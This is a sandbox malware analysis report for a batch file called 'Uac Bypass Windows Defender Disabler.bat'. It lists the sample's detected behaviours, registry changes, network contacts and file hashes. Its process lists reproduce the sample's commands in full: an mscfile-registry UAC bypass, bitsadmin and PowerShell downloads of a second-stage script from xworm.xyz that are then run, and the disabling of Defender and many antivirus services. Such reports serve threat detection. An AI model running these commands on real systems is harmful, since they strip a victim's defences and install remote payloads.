Analysis Overview
SHA256
acdf188d1f3e0d039a2e1b375566acdf640196cbb42ead21be755f9c438e041e
Threat Level: Known bad
The file Uac Bypass Windows Defender Disabler.bat was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
Modifies Windows Defender Real-time Protection settings
Windows security bypass
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Download via BitsAdmin
Launches sc.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Modifies registry key
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-29 21:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-29 21:12
Reported
2024-07-29 21:15
Platform
win10-20240404-en
Max time kernel
133s
Max time network
138s
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Stops running service(s)
Launches sc.exe
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Roaming" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Local\Temp" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScheduledScan" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableTamperProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0 -PropertyType DWORD -Force"
C:\Windows\system32\sc.exe
sc stop mfevtp
C:\Windows\system32\sc.exe
sc config mfevtp start= disabled
C:\Windows\system32\sc.exe
sc stop mfefire
C:\Windows\system32\sc.exe
sc config mfefire start= disabled
C:\Windows\system32\sc.exe
sc stop mfehidk
C:\Windows\system32\sc.exe
sc config mfehidk start= disabled
C:\Windows\system32\sc.exe
sc stop mfeapfk
C:\Windows\system32\sc.exe
sc config mfeapfk start= disabled
C:\Windows\system32\sc.exe
sc stop mfeavfk
C:\Windows\system32\sc.exe
sc config mfeavfk start= disabled
C:\Windows\system32\sc.exe
sc stop mfefirek
C:\Windows\system32\sc.exe
sc config mfefirek start= disabled
C:\Windows\system32\sc.exe
sc stop avastsvc
C:\Windows\system32\sc.exe
sc config avastsvc start= disabled
C:\Windows\system32\sc.exe
sc stop avastui
C:\Windows\system32\sc.exe
sc config avastui start= disabled
C:\Windows\system32\sc.exe
sc stop nissrv
C:\Windows\system32\sc.exe
sc config nissrv start= disabled
C:\Windows\system32\sc.exe
sc stop Symantec AntiVirus
C:\Windows\system32\sc.exe
sc config "Symantec AntiVirus" start= disabled
C:\Windows\system32\sc.exe
sc stop ccSvcHst
C:\Windows\system32\sc.exe
sc config ccSvcHst start= disabled
C:\Windows\system32\sc.exe
sc stop NortonSecurity
C:\Windows\system32\sc.exe
sc config NortonSecurity start= disabled
C:\Windows\system32\sc.exe
sc stop Norton AntiVirus
C:\Windows\system32\sc.exe
sc config "Norton AntiVirus" start= disabled
C:\Windows\system32\taskkill.exe
taskkill /F /IM Mcafee
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcafee
C:\Windows\system32\taskkill.exe
taskkill /F /IM Mcafee.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcafee.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McUICnt.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McPltCmd.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcuihost.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McInstru.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM avastui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ccSvcHst.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mfefirek.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mfehidk.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM avastsvc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McUICnt.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McPltCmd.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ModuleCoreService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ZhuDongFangYu.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM 360Safe.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM 360Tray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ns.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
memory/4004-4-0x00007FFC29E13000-0x00007FFC29E14000-memory.dmp
memory/4004-5-0x0000016B271C0000-0x0000016B271E2000-memory.dmp
memory/4004-7-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp
memory/4004-9-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp
memory/4004-10-0x0000016B27370000-0x0000016B273E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvsc3lbd.kxi.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4004-25-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp
memory/4004-31-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
| MD5 | 03bf8860dbd0724e466baf1e1bca86b3 |
| SHA1 | bde4d3ef9ac846e1e83bea37f88097cd370d5197 |
| SHA256 | 968dc5ab087e7a593d9b2682c2f6ee8aa6fd756ae874328a12d892d2b68fd0af |
| SHA512 | 0f3f5492be21a3af8262363f3d593aa63080f2d2db574451d8b94d4f00c3c3f06cb17c5795e6cccef84e9ebe684062a51829139177f7539f6629373e56e2e92f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 42d4b1d78e6e092af15c7aef34e5cf45 |
| SHA1 | 6cf9d0e674430680f67260194d3185667a2bb77b |
| SHA256 | c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0 |
| SHA512 | d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a15e30f9c44a503e3666936a851b0f7 |
| SHA1 | 65edb50e8fd7cd7077749165c8544b08ae094e5e |
| SHA256 | 1ff7c93f3aba06119b7b8663dc8fd00780d965cdde5afae68ea6603601771441 |
| SHA512 | 539a2043e27f058c81370a5d1b35f2c18af866c6416751c0d77aa3439392c8b254096055da83b1719ae066d8ded6a8c7d974a5fe5cd7873d664a6613de3907ec |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6ab1c560795981f7ae9739268cfe22e |
| SHA1 | 289d5ae79442bba5353821f7bdbb4075f52b8013 |
| SHA256 | cfe7887979a8fbb050bc46de23567bd2b757784a389faa4cee691e5ba8ea9a20 |
| SHA512 | 717ee3dad2daa8ec4fa9d55d25c377637858194af3562b291e9672a767edd7b7faecb9a54e27eef9ed5b2a7072e873718daa538c33e761f565a5c5c7e84da988 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-29 21:12
Reported
2024-07-29 21:15
Platform
win11-20240709-en
Max time kernel
147s
Max time network
153s
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Stops running service(s)
Launches sc.exe
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
